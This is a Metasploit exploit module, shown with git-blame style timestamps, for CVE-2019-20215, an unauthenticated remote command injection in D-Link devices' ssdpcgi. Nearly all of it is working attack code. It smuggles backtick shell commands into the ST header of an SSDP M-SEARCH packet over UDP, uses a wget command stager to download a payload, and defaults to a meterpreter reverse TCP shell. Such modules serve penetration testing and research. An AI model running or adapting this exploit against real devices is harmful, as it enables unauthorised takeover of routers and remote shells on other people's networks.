2020-01-28 16:15:24 -03:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Udp
|
|
|
|
|
include Msf::Exploit::CmdStager
|
2023-11-27 19:35:34 +00:00
|
|
|
include Msf::Module::Deprecated
|
|
|
|
|
|
2023-12-05 10:51:12 +01:00
|
|
|
deprecated(Date.new(2024, 12, 1), 'Use `exploit/linux/upnp/dlink_upnp_msearch_exec` instead')
|
2020-01-28 16:15:24 -03:00
|
|
|
|
|
|
|
|
def initialize(info = {})
|
2025-05-18 16:29:41 +10:00
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
|
|
|
|
|
},
|
|
|
|
|
'Author' => [
|
2020-01-28 16:15:24 -03:00
|
|
|
's1kr10s',
|
|
|
|
|
'secenv'
|
|
|
|
|
],
|
2025-05-18 16:29:41 +10:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'References' => [
|
2020-01-28 16:15:24 -03:00
|
|
|
['CVE', '2019-20215'],
|
2020-02-04 15:20:57 -03:00
|
|
|
['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
|
2020-01-28 16:15:24 -03:00
|
|
|
],
|
2025-05-18 16:29:41 +10:00
|
|
|
'DisclosureDate' => '2019-12-24',
|
|
|
|
|
'Privileged' => true,
|
|
|
|
|
'Platform' => 'linux',
|
|
|
|
|
'Arch' => ARCH_MIPSBE,
|
|
|
|
|
'DefaultOptions' => {
|
|
|
|
|
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
|
|
|
|
|
'CMDSTAGER::FLAVOR' => 'wget',
|
|
|
|
|
'RPORT' => '1900'
|
2020-01-28 16:15:24 -03:00
|
|
|
},
|
2025-05-18 16:29:41 +10:00
|
|
|
'Targets' => [
|
|
|
|
|
[ 'Auto', {} ],
|
2020-01-28 16:15:24 -03:00
|
|
|
],
|
2025-05-18 16:29:41 +10:00
|
|
|
'CmdStagerFlavor' => %w[echo wget],
|
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'Notes' => {
|
|
|
|
|
'Stability' => [CRASH_SAFE],
|
|
|
|
|
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
|
|
|
|
|
'Reliability' => [REPEATABLE_SESSION]
|
|
|
|
|
}
|
|
|
|
|
)
|
|
|
|
|
)
|
2020-01-28 16:15:24 -03:00
|
|
|
|
2025-05-18 16:29:41 +10:00
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Msf::OptEnum.new('VECTOR', [true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
|
|
|
|
|
]
|
|
|
|
|
)
|
2020-01-28 16:15:24 -03:00
|
|
|
end
|
2020-02-04 15:20:57 -03:00
|
|
|
|
2020-01-28 16:15:24 -03:00
|
|
|
def exploit
|
|
|
|
|
execute_cmdstager(linemax: 1500)
|
|
|
|
|
end
|
|
|
|
|
|
2025-05-18 16:29:41 +10:00
|
|
|
def execute_command(cmd, _opts)
|
2020-02-04 14:04:23 -03:00
|
|
|
type = datastore['VECTOR']
|
2025-05-18 16:29:41 +10:00
|
|
|
if type == 'URN'
|
|
|
|
|
print_status('Target Payload URN')
|
2020-01-28 16:15:24 -03:00
|
|
|
val = "urn:device:1;`#{cmd}`"
|
2020-02-04 14:04:23 -03:00
|
|
|
else
|
2025-05-18 16:29:41 +10:00
|
|
|
print_status('Target Payload UUID')
|
2020-01-28 16:15:24 -03:00
|
|
|
val = "uuid:`#{cmd}`"
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
connect_udp
|
2020-02-04 14:04:23 -03:00
|
|
|
header = "M-SEARCH * HTTP/1.1\r\n"
|
2025-05-18 16:29:41 +10:00
|
|
|
header << "Host:239.255.255.250: #{datastore['RPORT']}\r\n"
|
2020-02-04 14:04:23 -03:00
|
|
|
header << "ST:#{val}\r\n"
|
|
|
|
|
header << "Man:\"ssdp:discover\"\r\n"
|
|
|
|
|
header << "MX:2\r\n\r\n"
|
2020-01-28 16:15:24 -03:00
|
|
|
udp_sock.put(header)
|
|
|
|
|
disconnect_udp
|
|
|
|
|
end
|
|
|
|
|
end
|
